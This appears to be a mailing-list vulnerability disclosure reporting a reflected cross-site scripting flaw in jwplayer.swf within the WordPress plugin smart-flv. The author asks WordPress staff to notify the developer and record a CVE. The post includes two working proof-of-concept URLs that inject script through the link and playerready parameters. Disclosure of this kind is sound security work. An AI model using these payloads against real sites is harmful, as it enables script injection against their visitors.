With wpscan-team I noticed that file jwplayer.swf in WordPress plugin smart-flv
is vulnerable to reflected XSS vulnerability.
URL: http://wordpress.org/extend/plugins/smart-flv/
416d0313c5f286c3a8e9daff520a9f44439b93f7 http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf
With user interaction (clicking the page):
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link
No interaction:
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29
WordPress guys could you report this to the developer since I don't know his/her
email address, thanks? Could you also tell me if there is a way to contact
plugin developers directly, thank you. Please include CVE to changelog if
possible.
--
Henri Salo
ps. http://paste.nerv.fi/36167527-horse.jpeg